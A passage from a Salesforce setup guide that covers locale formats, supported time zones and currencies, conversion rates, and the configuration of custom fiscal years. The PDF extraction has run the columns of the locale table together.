(Canada)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1'234.5606:0002.01.2008
16:30

Swiss Franc:
CHF

fr_CHFrench
(Switzerland)

City

Country -
State
ZipCode
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002/01/2008
16:30

Euro: EURfr_FRFrench
(France)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002/01/2008
16:30

Euro: EURfr_LUFrench
(Luxembourg)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002/01/2008
16:30

Moroccan
Dirham:
MAD

fr_MCFrench
(Monaco)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:0002/01/2008
16:30

Euro: EURga_IEIrish (Ireland)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008.
16:30

Croatian
Kuna: HRK

hr_HRCroatian
(Croatia)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

LName
FName

1 234,566:002008.01.02.
16:30

huHungarian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002008.01.02.
16:30

Hungarian
Forint: HUF

hu_HUHungarian
(Hungary)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Armenian
Dram: AMD

hy_AMArmenian
(Armenia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:002008/01/02
16:30

inIndonesian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002/01/2008
16:30

Indonesian
Rupiah: IDR

in_IDIndonesian
(Indonesia)

City, State
ZipCode

Country

204

Understanding Language, Locale, and CurrencySet Up Your Organization



Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:002.1.2008
16:30

Iceland
Krona: ISK

is_ISIcelandic
(Iceland)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566.0002/01/2008
16.30

itItalian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1'234.5606:0002.01.2008
16:30

Swiss Franc:
CHF

it_CHItalian
(Switzerland)

City

Country -
State
ZipCode

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566.0002/01/2008
16.30

Euro: EURit_ITItalian (Italy)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:0016:30
02/01/2008

iwHebrew

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.5606:0016:30
02/01/2008

Israeli Shekel:
ILS

iw_ILHebrew
(Israel)

City, State
ZipCode

Country

Country

ZipCode
State City

LName
FName

1,234.566:002008/01/02
16:30

jaJapanese

Address Line
1,

Address Line
2

Country

ZipCode
State City

LName
FName

1,234.566:002008/01/02
16:30

Japanese Yen:
JPY

ja_JPJapanese
(Japan)

Address Line
1,

Address Line
2

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

kaGeorgian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Georgian
Lari: GEL

ka_GEGeorgian
(Georgia)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Kazakhstan
Tenge: KZT

kk_KZKazakh
(Kazakhstan)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Cambodia
Riel: KHR

km_KHKhmer
(Cambodia)

City, State
ZipCode

Country

Country

ZipCode
State City

LName
FName

1,234.56   6:002008. 1. 2 PM
4:30

koKorean

Address Line
1,

Address Line
2

Country

ZipCode
State City

LName
FName

1,234.56   6:002008. 1. 2 PM
4:30

Korean Won:
KRW

ko_KRKorean
(South Korea)

Address Line
1,

Address Line
2

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606.002008.1.2
16.30

Lithuanian
Lita: LTL

lt_LTLithuanian
(Lithuania)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:002008.2.1
16:30

Latvian Lat:
LVL

lv_LVLatvian
(Latvia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM02/01/2008
4:30 PM

Malaysian
Ringgit: MYR

ms_MYMalay
(Malaysia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002-1-2008
16:30

nlDutch

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002/01/2008
16:30

Euro: EURnl_BEDutch
(Belgium)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002-1-2008
16:30

Euro: EURnl_NLDutch
(Netherlands)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002-1-2008
16:30

Surinam
Dollar: SRD

nl_SRDutch
(Suriname)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002.01.2008
16:30

noNorwegian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:0002.01.2008
16:30

Norwegian
Krone: NOK

no_NONorwegian
(Norway)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:002008-01-02
16:30

plPolish

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002-01-2008
16:30

ptPortuguese

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002-01-2008
16:30

Angola
Kwanza:
AOA

pt_AOPortuguese
(Angola)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002/01/2008
16:30

Brazilian
Real: BRL

pt_BRPortuguese
(Brazil)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002-01-2008
16:30

Euro: EURpt_PTPortuguese
(Portugal)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

roRomanian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

Romanian
Leu (New):
RON

ro_RORomanian
(Romania)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:0002.01.2008
16:30

ruRussian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:0002.01.2008
16:30

Russian
Rouble: RUB

ru_RURussian
(Russia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.0002.01.2008.
16:30

shSerbian
(Latin)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.0002.01.2008.
16:30

Convertible
Mark: BAM

sh_BASerbian
(Latin)
(Bosnia and
Herzegovina)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.0002.01.2008.
16:30

Serbian Dinar
(Serbia): RSD

Euro
(Montenegro):
EUR

sh_CSSerbian
(Latin)
(Serbia and
Montenegro)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

skSlovak

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,566:002.1.2008
16:30

Euro: EURsk_SKSlovak
(Slovakia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:002.1.08 16:30Euro: EURsl_SISlovenian
(Slovenia)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.002.1.2008.
16.30

srSerbian

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.002008-01-02
16:30

Convertible
Mark: BAM

sr_BASerbian
(Bosnia and
Herzegovina)

City, State
ZipCode

Country

212

Understanding Language, Locale, and CurrencySet Up Your Organization



Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606.002.1.2008.
16.30

Serbian Dinar
(Serbia): RSD

Euro
(Montenegro):
EUR

sr_CSSerbian
(Serbia and
Montenegro)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:002008-01-02
16:30

svSwedish

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1 234,5606:002008-01-02
16:30

Swedish
Krona: SEK

sv_SESwedish
(Sweden)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00  .2/1/2008,
16:30  .

thThai

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00  .2/1/2551,
16:30  .

Thai Baht:
THB

th_THThai
(Thailand)

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

tlTagalog

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Philippines
Peso: PHP

tl_PHTagalog
(Philippines)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

trTurkish

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,5606:0002.01.2008
16:30

Turkish Lira:
TRY

tr_TRTurkish
(Turkey)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002.01.2008
16:30

ukUkrainian

City, State
ZipCode

Country
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Address Line
1,

Address Line
2

Ms. FName
LName

1.234,566:0002.01.2008
16:30

Ukraine
Hryvnia:
UAH

uk_UAUkrainian
(Ukraine)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

Ms. FName
LName

1,234.566:00 AM1/2/2008 4:30
PM

Pakistani
Rupee: PKR

ur_PKUrdu
(Pakistan)

City, State
ZipCode

Country

Address Line
1,

Address Line
2

LName
FName

1.234,5606:0016:30
02/01/2008

viVietnamese

City, State
ZipCode

Country

Address Line
1,

Address Line
2

LName
FName

1.234,5606:0016:30
02/01/2008

Vietnam
Dong: VND

vi_VNVietnamese
(Vietnam)

City, State
ZipCode

Country

Country

ZipCode
State City

LName
FName

1,234.56  6:002008-1-2
PM4:30

zhChinese

Address Line
1,

Address Line
2
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Address
format

Name formatNumber
format

Time formatDate and
time format

Default
currency

CodeName

Country

ZipCode
State City

LName
FName

1,234.56  6:002008-1-2
PM4:30

Chinese
Yuan: CNY

zh_CNChinese
(China)

Address Line
1,

Address Line
2

Country

ZipCode
State City

LName
FName

1,234.56  6:002008 1 2 
PM4:30

Hong Kong
Dollar: HKD

zh_HKChinese
(Hong Kong)

Address Line
1,

Address Line
2

Country

ZipCode
State City

LName
FName

1,234.56   6:002008/1/2 PM
4:30

Taiwan
Dollar: TWD

zh_TWChinese
(Taiwan)

Address Line
1,

Address Line
2

See Also:
Understanding Language, Locale, and Currency
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Supported Time Zones

Available in: Group, Professional, Enterprise, Unlimited, Database.com, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view company information:

“Customize Application”To change company information:

The available personal setup options vary according to which Salesforce Edition you have.

You can find a list of Salesforce supported times zones and codes under your personal settings.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information, then click Edit.
• If you clicked My Settings, select Personal > Language & Time Zone.

3. Click the Time Zone drop-down list for a list of supported time zones.

See Also:
Understanding Language, Locale, and Currency

Setting Corporate Currency

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

You must specify a Corporate Currency, which reflects the currency in which your corporate headquarters reports revenue. A
salesforce.com representative initially sets your corporate currency upon activation of the feature. All conversion rates are based
on the corporate currency.

Important:  Ensure that Multi-Currency is enabled in your organization.
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To change your corporate currency:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Change Corporate.
3. Choose a new corporate currency from the list of active currencies, and click Save.

See Also:
Understanding Language, Locale, and Currency
Editing Conversion Rates
Supported Currencies

Editing Conversion Rates

Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

You can manage exchange rates between your active and inactive currencies and the corporate currency by editing the conversion
rates. These are static exchange rates that apply to all currency fields used in your organization. In addition to these conversion
rates, your organization may also use dated exchange rates for opportunities and opportunity products.

To edit your organization's static conversion rates:

1. From Setup, click Company Profile > Manage Currencies.
2. If advanced currency management is enabled, click Manage Currencies.
3. Click Edit Rates in the Active Currencies or Inactive Currencies lists.
4. Enter the conversion rate between each currency and your corporate currency.
5. Click Save.

When you change the conversion rates, currency amounts are updated using the new rates. Previous conversion rates are not
stored. All conversions within opportunities, forecasts, and other amounts use the current conversion rate.

If your organization uses advanced currency management, you can also manage dated exchange rates for currency fields on
opportunities and opportunity products.

Note:

• You cannot track revenue gain or loss based on currency fluctuations.
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• Changing conversion rates causes a mass recalculation of roll-up summary fields, which may take up to 30 minutes,
depending on the number of records affected and other factors.

See Also:
Setting Corporate Currency
Managing Multiple Currencies
Activating and Deactivating Currencies
Administrator setup guide: Using Multiple Currencies

Supported Currencies

Available in: Group, Professional, Enterprise, Unlimited, Database.com, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view company information:

“Customize Application”To change company information:

The available personal setup options vary according to which Salesforce Edition you have.

Salesforce supported currencies:

Currency CodeCurrency Name

AFNAfghanistan Afghani

ALLAlbanian Lek

DZDAlgerian Dinar

AOAAngola Kwanza

ARSArgentine Peso

AMDArmenian Dram

AWGAruba Florin

AUDAustralian Dollar

AZNAzerbaijanian Manat

BSDBahamian Dollar

BHDBahraini Dinar

BDTBangladesh Taka

BBDBarbados Dollar
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Currency CodeCurrency Name

BYRBelarussian Ruble

BZDBelize Dollar

BMDBermuda Dollar

BTNBhutan Ngultrum

BOVBolivia Mvdol

BOBBolivian Boliviano

BWPBotswana Pula

BRLBrazilian Real

GBPBritish Pound

BNDBrunei Dollar

BGNBulgaria Lev

BIFBurundi Franc

KHRCambodia Riel

CADCanadian Dollar

CVECape Verde Escudo

KYDCayman Islands Dollar

XOFCFA Franc (BCEAO)

XAFCFA Franc (BEAC)

CLPChilean Peso

CNChinese Renminbi

CNYChinese Yuan

COPColombian Peso

KMFComoros Franc

BAMConvertible Marks

CRCCosta Rica Colon

HRKCroatian Kuna

CUPCuban Peso

CZKCzech Koruna

DKKDanish Krone

DJFDijibouti Franc

DOPDominican Peso
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Currency CodeCurrency Name

XCDEast Caribbean Dollar

EGPEgyptian Pound

ERNEritrea Nakfa

EEKEstonian Kroon

ETBEthiopian Birr

EUREuro

FKPFalkland Islands Pound

FJDFiji Dollar

CDFFranc Congolais

GMDGambian Dalasi

GELGeorgia Lari

GHSGhanian Cedi

GIPGibraltar Pound

GTQGuatemala Quetzal

GNFGuinea Franc

GYDGuyana Dollar

HTGHaiti Gourde

HNLHonduras Lempira

HKDHong Kong Dollar

HUFHungarian Forint

ISKIceland Krona

INRIndian Rupee

IDRIndonesian Rupiah

IRRIranian Rial

IQDIraqi Dinar

ILSIsraeli Shekel

JMDJamaican Dollar

JPYJapanese Yen

JODJordanian Dinar

KZTKazakhstan Tenge

KESKenyan Shilling
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Currency CodeCurrency Name

KRWKorean Won

KWDKuwaiti Dinar

KGSKyrgyzstan Som

LAKLao Kip

LVLLatvian Lat

LBPLebanese Pound

LSLLesotho Loti

LRDLiberian Dollar

LYDLibyan Dinar

LTLLithuanian Lita

MOPMacau Pataca

MKDMacedonian Denar

MGAMalagasy Ariary

MWKMalawi Kwacha

MYRMalaysian Ringgit

MVRMaldives Rufiyaa

MROMauritania Ougulya

MURMauritius Rupee

MXNMexican Peso

MXVMexican Unidad de Inversion (UDI)

MDLMoldovan Leu

MNTMongolian Tugrik

MADMoroccan Dirham

MZNMozambique Metical

MMKMyanmar Kyat

NADNamibian Dollar

NPRNepalese Rupee

ANGNeth Antilles Guilder

NZDNew Zealand Dollar

NIONicaragua Cordoba

NGNNigerian Naira
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Currency CodeCurrency Name

KPWNorth Korean Won

NOKNorwegian Krone

OMROmani Rial

XPFPacific Franc

PKRPakistani Rupee

PABPanama Balboa

PGKPapua New Guinea Kina

PYGParaguayan Guarani

PENPeruvian Nuevo Sol

PHPPhilippine Peso

PLNPolish Zloty

QARQatar Rial

RONRomanian Leu

RUBRussian Rouble

RWFRwanda Franc

WSTSamoa Tala

STDSao Tome Dobra

SARSaudi Arabian Riyal

RSDSerbian Dinar

SCRSeychelles Rupee

SLLSierra Leone Leone

SGDSingapore Dollar

SBDSolomon Islands Dollar

SOSSomali Shilling

ZARSouth African Rand

LKRSri Lanka Rupee

SHPSt Helena Pound

SDGSudanese Pound

SRDSurinam Dollar

SZLSwaziland Lilageni

SEKSwedish Krona
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Currency CodeCurrency Name

CHFSwiss Franc

SYPSyrian Pound

TWDTaiwan Dollar

TJSTajik Ruble

TZSTanzanian Shilling

THBThai Baht

TOPTonga Pa'anga

TTDTrinidad&Tobago Dollar

TNDTunisian Dinar

TRYTurkish Lira

TMTTurkmenistan Manat

USDU.S. Dollar

AEDUAE Dirham

UGXUgandan Shilling

UAHUkraine Hryvnia

CLFUnidades de fomento

UYUUruguayan New Peso

UZSUzbekistan Sum

VUVVanuatu Vatu

VEFVenezuelan Bolivar Fuerte

VNDVietnam Dong

YERYemen Riyal

ZMKZambian Kwacha

ZWDZimbabwe Dollar

See Also:
Setting Corporate Currency
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About Fiscal Years
Available in: All Editions except for Database.com.

User Permissions Needed

“Customize Application”To define or edit fiscal years:

“View Setup and Configuration”To view fiscal years:

Not all businesses use the Gregorian year for their fiscal year. Salesforce makes it easy for you to define a fiscal year that fits
your business needs.

If your fiscal year follows the Gregorian calendar, but does not start in January, you can simply and easily set your fiscal year
by defining a standard fiscal year. If your fiscal year follows a different structure, you can define a custom fiscal year that meets
your needs.

Whether you use a standard fiscal year or a custom fiscal year, you can define individual fiscal years once for your entire
organization. These fiscal year definitions allow you to use these fiscal periods throughout Salesforce including in reporting,
opportunities, and forecasting.

Tip:  As a best practice, define your custom fiscal years after your current forecast. Also, update product schedules
and forecasts whenever a custom fiscal year is created or changed.

Standard Fiscal Years
Standard fiscal years are periods that follow the Gregorian calendar, but can start on the first day of any month of the year.
Unlike custom fiscal year, standard fiscal years can be used by organizations that do not have customizable forecasting enabled.

Custom Fiscal Years
For companies that break down their fiscal years, quarters, and weeks into custom fiscal periods based on their financial
planning requirements, Salesforce allows you to flexibly define these periods using custom fiscal years. For example, as part
of a custom fiscal year, you can create a 13-week quarter represented by three periods of 4, 4, and 5 weeks, rather than calendar
months.

If you use a common fiscal year structure, such as 4-4-5 or a 13-period structure, you can rapidly define a fiscal year by simply
specifying a start date and an included template. If your fiscal year structure is not included in the templates, you can easily
modify a template. For example, if you use three fiscal quarters per year (a trimester) rather than four, delete or modify quarters
and periods to meet your needs.

Custom fiscal periods can be named based on your standards. For example, a fiscal period could be called “P2” or “February.”

Fiscal years can be modified any time that you need to change their definition. For example, an extra week could be added to
synchronize a custom fiscal year with a standard calendar in a leap year. Changes to fiscal year structure take effect immediately
upon being saved.

Considerations When Enabling Custom Fiscal Years
Before enabling custom fiscal year, consider these issues:
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• Once you enable custom fiscal years, you cannot disable it. However, you can define custom fiscal years that follow the
same Gregorian calendar structure as the Salesforce standard fiscal years.

• Fiscal years will not be automatically created. The only fiscal years available are those that your organization defines.
• Custom fiscal years can be enabled only with customizable forecasting, not with collaborative forecasting.
• Enabling or defining custom fiscal years impacts your forecasts, reports, and quotas.

◊ When you define a new custom fiscal year, or when you change the length of any fiscal period, all quotas for that year
will be lost.

◊ When you define a new custom fiscal year, or when you change the length of any fiscal period, forecasts, forecast history,
and forecast overrides are lost. Changing the length of a period may also affect the previous or next fiscal year and
reports associated with it. Forecasts for periods before the first custom fiscal year will be saved and can be accessed as
usual.

◊ Forecast reports for a period after the last defined fiscal year cannot be grouped by period, only by date.
◊ To ensure your forecast reports have the most updated amounts, view the forecast for the period included in the report

before running a forecast report.

• Your organization will not be able to use fiscal period columns in opportunity, opportunity with product, or opportunity
with schedule reports.

• Opportunity list views will not include a fiscal period columns.
• When custom fiscal years are enabled, you can't use the FISCAL_MONTH(), FISCAL_QUARTER(), or FISCAL_YEAR()

date functions in SOQL.

See Also:
Setting the Fiscal Year
Customizing the Fiscal Year Structure
Customizing the Fiscal Year Labels
Choosing a Custom Fiscal Year Template
Defining a Custom Fiscal Year

Setting the Fiscal Year

Available in: All Editions except for Database.com.

User Permissions Needed

“View Setup and Configuration”To view fiscal year:

“Customize Application”To change fiscal year:

You can set one of two types of fiscal years: standard fiscal years or custom fiscal years. For specific information on both types
of fiscal years, see About Fiscal Years on page 225.

Setting a Standard Fiscal Year

If your organization follows the Gregorian calendar year, but you need to change the fiscal year start month, use standard fiscal
years. Standard fiscal years can start on the first day of any month, and you can specify whether the fiscal year is named for
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the starting or ending year. For example, if your fiscal year starts in April 2011 and ends in March 2012, your fiscal year setting
can be either 2011 or 2012. If your fiscal year is more complicated than this, see Enabling Custom Fiscal Years on page 227

Warning:

• Users of Customizable Forecasting: You can lose all quotas, forecast history, and overrides if you change your
fiscal start month. To preserve your data, change a month to one previously used as the first month in a quarter.
For example, if your start month is April and you change it to May, which isn't a month that starts a fiscal quarter,
you'll lose data. If you change it to July, which is a month that starts a fiscal quarter, you'll preserve your data.

• Users of Collaborative Forecasts: Quota and adjustment information is purged if you change your fiscal year start
month.

To set a standard fiscal year:

1. Back up your current data.

a. Run and export these reports to Excel:

• Opportunity Pipeline
• Quarterly Forecast Summary
• Quota vs. Actual

b. Optionally, generate weekly export data.

We suggest you do this because changing the fiscal year will cause fiscal periods to shift. This change will affect opportunities
and forecasts organization-wide.

2. From Setup, click Company Profile > Fiscal Year.
3. Select Standard Fiscal Year.
4. Choose the start month.
5. Specify whether the fiscal year is defined by the year it begins or ends.
6. Optionally, select Apply to All Forecasts and Quotas if you want to apply the new fiscal year settings to your

existing forecasts and quotas. This option may not be available depending on your forecast settings.
7. Click Save to finish.

Enabling Custom Fiscal Years

If your fiscal year definition is not met by a standard fiscal year, you can enable custom fiscal years which will allow you to
flexibly define a more complex fiscal year structure.

To enable custom fiscal years:

Note:  Before enabling custom fiscal years, make sure that you have exported any data related to fiscal periods. For
specific details about the effects of enabling custom fiscal years, see About Fiscal Years on page 225.

1. Back up your current data.

a. Run and export these reports to Excel:

• Opportunity Pipeline
• Quarterly Forecast Summary
• Quota vs. Actual

b. Optionally, generate weekly export data.
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We suggest you do this because changing the fiscal year will cause fiscal periods to shift. This change will affect opportunities
and forecasts organization-wide.

2. From Setup, click Company Profile > Fiscal Year.
3. Select Custom Fiscal Year.
4. Click Enable Custom Fiscal Years.
5. If you understand the effects of enabling custom fiscal years and you have all your data exported, click OK.

Warning:  Custom fiscal years cannot be disabled once enabled. Enabling custom fiscal years has impacts on your
reports, forecasts, quotas, and other date sensitive material. Do not enable custom fiscal years unless you understand
and are prepared for all the implications.

If you are not certain you want to enable custom fiscal years, click Cancel.
6. Once you have enabled custom fiscal years, define your fiscal year. See Defining a Custom Fiscal Year on page 233.

Customizing the Fiscal Year Structure

Available in: All Editions except for Database.com.

User Permissions Needed

“Customize Application”To define or edit fiscal years:

“View Setup and Configuration”To view fiscal years:

If your custom fiscal year needs a different structure than one available from the templates, you can use advanced customization
to modify the details of your custom fiscal year definition. Custom fiscal years allow you to:

• Customize the period labels

• Reset the fiscal year to a template

• Add or remove fiscal periods

• Change the length of a fiscal week

Warning:  Changing the length of a fiscal year has an impact on forecasting and reporting. For detailed information
on the impact, see About Fiscal Years on page 226.

Customizing the Period Labels

The fiscal year period labels for forecasting and reporting are set by the default label values for the fiscal year periods. To
change them, see Customizing the Fiscal Year Labels on page 230.

Resetting the Fiscal Year to a Template

During customization, if you want to return to a fiscal year template, select a template from the Reset Fiscal Year
Structure drop-down list.
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Note:  Resetting the fiscal year structure to a template removes all the customizations you made to the fiscal year.

Adding or Removing Fiscal Periods

You can easily add or remove fiscal periods (such as quarters, periods, or weeks) from the fiscal year structure.

To add fiscal periods:

1. From Setup, click Company Profile > Fiscal Year.
2. Click Edit for the fiscal year you want to edit.
3. If it is not already expanded, expand the Advanced Customization section.
4. Select the checkbox for the period before the new period. For example, if you want to add a new quarter, and you want it

to be the second quarter, select the checkbox for the first quarter.
5. Click Insert.

Note:  The maximum number of fiscal periods is 250.

To remove a fiscal period:

1. From Setup, click Company Profile > Fiscal Year.
2. Click Edit for the fiscal year you want to edit.
3. If it is not already expanded, expand the Advanced Customization section.
4. Select the checkbox for the period you want to delete.
5. Click Delete.

Note:  You must have at least one quarter, one period, and one week.

Changing the Length of a Fiscal Week

To change the length of fiscal periods:

1. From Setup, click Company Profile > Fiscal Year.
2. Click Edit for the fiscal year you want to edit.
3. If it is not already expanded, expand the Advanced Customization section.
4. Choose the length from the Duration drop-down list for the fiscal week.

Note:  To change the duration of a fiscal period or quarter, insert or delete weeks, or change the length of weeks
that compose the period or quarter.

Once you have customized your fiscal year, preview the fiscal year definition. If it is correct, close the preview and click Save
to save your fiscal year.
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Customizing the Fiscal Year Labels

Available in: All Editions except Database.com.

User Permissions Needed

“Customize Application”To define or edit fiscal years:

“View Setup and Configuration”To view fiscal years:

There are two ways to customize the labeling of your fiscal year:

1. Naming schemes and prefix choices
2. Fiscal year picklist customization

Fiscal Year Naming Schemes and Prefix Choices

When defining a custom fiscal year, you can choose the labeling scheme to use for your custom fiscal year. Each fiscal period
type (quarter, period, and week) has a list of labeling schemes that you can select.

Quarter Name Scheme

Numbered by Year
This option allows you to add the quarter number to the quarter label. The quarter label is a combination of the
label for the quarter prefix and the quarter number. For example, if the quarter prefix is “Q”, the label for the third
quarter Q3. To customize the quarter prefix, see Quarter Prefix on page 231. By default the number for each
quarter is set by their order (the first quarter is labeled “1”), but you can customize it by selecting a different value
from the quarter detail drop-down list.

Custom Quarter Names
This option allows you to set the quarter label to any name. The quarter label is set to the name you select from
Quarter Name. By default the order of the quarter names is the same as the picklist order, but you can customize
it by selecting a different value from the quarter detail drop-down list.

Period Name Scheme

Numbered By Year
This option allows you to set the period label based on its position in the year. The period label is a combination
of the period prefix and the period number. Period numbers do not reset in each quarter. For example, if the period
prefix is “P,” the label for the sixth period is P6. To customize the Period Prefix, see Period Prefix on
page 231. By default the number for each period is set by their order (the first period is labeled “1”), but you can
customize it by selecting a different value from the period detail drop-down list.

Numbered By Quarter
This option allows you to set the period label based on its position in the quarter. The period label is a combination
of the period prefix and the period number. Period numbers reset in each quarter. For example, if the period prefix
is “P,” and the sixth period is the second period in the second quarter, its label is P2. To customize the period
prefix, see Period Prefix on page 231. By default the number for each period is set by their order within the
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quarter (the first period in a quarter is labeled “1”), but you can customize it by selecting a different value from the
period detail drop-down list.

Standard Month Names
This option allows you to set the period label to the month name of the start of the period. For example, if a period
started on October 12 and ends on November 10, the period label would be October.

Custom Period Names
This option allows you to set the period label to any string. The period label is set to the string you select from
Period Name. By default the order of the period names is the same as the picklist order, which you can customize
by selecting a different value from the period detail drop-down list.

Fiscal Year Picklists

Review these custom picklists to customize the labels for your custom fiscal year.

Quarter Prefix

The quarter prefix picklist is a list of options for the text that prefixes the quarter number or name if your fiscal year uses
the Numbered By Year quarter naming scheme. For example, if the fiscal quarter is called “Q4,” the “Q” is the quarter
prefix.

Period Prefix

The period prefix picklist is a list of options for the text that prefixes the period number or name if your fiscal year uses
the Numbered By Year period naming scheme. For example, if the fiscal quarter is called “P4,” the “P” is the period
prefix.

Quarter Name

The quarter name picklist is a list of options for the quarter name if your fiscal year uses the Custom Quarter Names
quarter naming scheme. For example, if you want to name your quarters for the seasons (Spring, Summer, Fall, and
Winter), you could set the quarter name list to those values.

Period Name

The period name picklist is a list of options for the quarter name if your fiscal year uses the Custom Period Names
quarter naming scheme. Similar to the quarter name picklist, you can choose meaningful names for the period name
picklist.

Customizing Fiscal Year Names

To customize one of these picklists:

1. From Setup, click Company Profile > Fiscal Year.
2. Click Edit next to the appropriate picklist.

See Also:
About Fiscal Years
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Choosing a Custom Fiscal Year Template

Available in: All Editions except Database.com.

User Permissions Needed

“Customize Application”To change your fiscal year:

When defining a new custom fiscal year, your first step is to choose a custom fiscal year template. These templates are available
to make it easier for you to define your custom fiscal year. They create a simple custom fiscal year that you can customize to
meet your exact needs.

Note:  If you choose a template and realize that it is not the best one for your fiscal year definition, you can reset it
